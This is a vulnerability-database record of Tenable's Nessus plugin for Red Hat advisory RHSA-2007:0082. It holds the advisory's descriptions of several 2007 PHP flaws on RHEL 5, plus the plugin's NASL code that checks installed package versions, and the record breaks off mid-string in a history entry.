{"id": "REDHAT-RHSA-2007-0082.NASL", "bulletinFamily": "scanner", "title": "RHEL 5 : php (RHSA-2007:0082)", "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension; the str_replace() function; and the imap_mail_compose() function. If very long strings were passed to the str_replace() function, an integer overflow could occur in memory allocation. If a script used the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker with access to a PHP application affected by any these issues could trigger the flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init() function could be forced into an infinite loop, consuming CPU resources for a limited time, until the script timeout alarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted source, certain WDDX input packets could expose a random portion of heap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a database, and the database table contents were under an attacker's control, a format string vulnerability was possible which could allow arbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial of service attack by submitting an input variable with a deeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.", "published": "2007-05-25T00:00:00", "modified": "2019-01-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=25317", "reporter": "Tenable", "references": ["https://access.redhat.com/security/cve/cve-2007-1285", "https://access.redhat.com/security/cve/cve-2007-1701", "https://access.redhat.com/security/cve/cve-2007-0910", "https://access.redhat.com/errata/RHSA-2007:0082", "https://access.redhat.com/security/cve/cve-2007-0988", "https://access.redhat.com/security/cve/cve-2007-0909", "https://access.redhat.com/security/cve/cve-2007-1825", "https://access.redhat.com/security/cve/cve-2007-0906", "https://access.redhat.com/security/cve/cve-2007-0907", "https://access.redhat.com/security/cve/cve-2007-1380", "https://access.redhat.com/security/cve/cve-2007-0908"], "cvelist": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908"], "type": "nessus", "lastseen": "2019-02-21T01:09:54", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "cvelist": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension; the str_replace() function; and the imap_mail_compose() function. If very long strings were passed to the str_replace() function, an integer overflow could occur in memory allocation. If a script used the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker with access to a PHP application affected by any these issues could trigger the flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init() function could be forced into an infinite loop, consuming CPU resources for a limited time, until the script timeout alarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted source, certain WDDX input packets could expose a random portion of heap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a database, and the database table contents were under an attacker's control, a format string vulnerability was possible which could allow arbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial of service attack by submitting an input variable with a deeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "97004e5ce768f086c85a0d8bc2e2779601ccceb076872fc7e1f776d5d2160a61", "hashmap": [{"hash": "141eb5e5e7f7efcaf70f35531014315a", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c3e05cd434c177d196d0963aa566ca39", "key": "sourceData"}, {"hash": "272915001366bda6e704e79ddbab5b04", "key": "references"}, {"hash": "5ed89809cd59db22c6c4bc5e691596fe", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "ddc199dc1dacc50b088328ca4eddaf1b", "key": "published"}, {"hash": "c986b43752781caa839decc2a0741192", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3c764d4cf584f9ded7aa4dcca57c78ff", "key": "modified"}, {"hash": "4b44f6da67fcb87f1db557fc9f19e20c", "key": "href"}, {"hash": "235ef73aacd3c98bd8a26e36742ff4ae", "key": "cpe"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "2e53e2231fd68fdc02c53c3b32b818ad", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25317", "id": "REDHAT-RHSA-2007-0082.NASL", "lastseen": "2018-11-13T16:43:09", "modified": "2018-11-10T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "25317", "published": "2007-05-25T00:00:00", "references": ["https://www.redhat.com/security/data/cve/CVE-2007-0907.html", "https://www.redhat.com/security/data/cve/CVE-2007-1825.html", "https://www.redhat.com/security/data/cve/CVE-2007-0910.html", "https://www.redhat.com/security/data/cve/CVE-2007-0988.html", "https://access.redhat.com/errata/RHSA-2007:0082", "https://www.redhat.com/security/data/cve/CVE-2007-1380.html", "https://www.redhat.com/security/data/cve/CVE-2007-0906.html", "https://www.redhat.com/security/data/cve/CVE-2007-0908.html", "https://www.redhat.com/security/data/cve/CVE-2007-1285.html", "https://www.redhat.com/security/data/cve/CVE-2007-1701.html", "https://www.redhat.com/security/data/cve/CVE-2007-0909.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0082. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25317);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2018/11/10 11:49:48\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1285\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496, 22764);\n script_xref(name:\"RHSA\", value:\"2007:0082\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0082)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0906.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0907.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0908.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0909.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0910.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1380.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1701.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1825.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0082\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0082\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "title": "RHEL 5 : php (RHSA-2007:0082)", "type": "nessus", "viewCount": 4}, "differentElements": ["references", "modified", "sourceData"], "edition": 6, "lastseen": "2018-11-13T16:43:09"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "cvelist": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension; the str_replace() function; and the imap_mail_compose() function. If very long strings were passed to the str_replace() function, an integer overflow could occur in memory allocation. If a script used the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker with access to a PHP application affected by any these issues could trigger the flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init() function could be forced into an infinite loop, consuming CPU resources for a limited time, until the script timeout alarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted source, certain WDDX input packets could expose a random portion of heap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a database, and the database table contents were under an attacker's control, a format string vulnerability was possible which could allow arbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial of service attack by submitting an input variable with a deeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "4ede82250a996e6cea28deac38f82f65056049fe22df73d7a61d7380fb187122", "hashmap": [{"hash": "141eb5e5e7f7efcaf70f35531014315a", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "42a29e0c952ea4d93d5908b4afdfab89", "key": "sourceData"}, {"hash": "5ed89809cd59db22c6c4bc5e691596fe", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "2ab893896877901f3ca480db3bed6e02", "key": "references"}, {"hash": "851dbb0f33630b51c53f0d6ca1a06fc3", "key": "modified"}, {"hash": "ddc199dc1dacc50b088328ca4eddaf1b", "key": "published"}, {"hash": "c986b43752781caa839decc2a0741192", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b44f6da67fcb87f1db557fc9f19e20c", "key": "href"}, {"hash": "235ef73aacd3c98bd8a26e36742ff4ae", "key": "cpe"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "2e53e2231fd68fdc02c53c3b32b818ad", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25317", "id": "REDHAT-RHSA-2007-0082.NASL", "lastseen": "2017-10-29T13:33:19", "modified": "2016-12-29T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "25317", "published": "2007-05-25T00:00:00", "references": ["https://www.redhat.com/security/data/cve/CVE-2007-0907.html", "https://www.redhat.com/security/data/cve/CVE-2007-1825.html", "https://www.redhat.com/security/data/cve/CVE-2007-0910.html", "https://www.redhat.com/security/data/cve/CVE-2007-0988.html", "https://www.redhat.com/security/data/cve/CVE-2007-1380.html", "https://www.redhat.com/security/data/cve/CVE-2007-0906.html", "https://www.redhat.com/security/data/cve/CVE-2007-0908.html", "https://www.redhat.com/security/data/cve/CVE-2007-1285.html", "https://www.redhat.com/security/data/cve/CVE-2007-1701.html", "https://www.redhat.com/security/data/cve/CVE-2007-0909.html", "http://rhn.redhat.com/errata/RHSA-2007-0082.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text 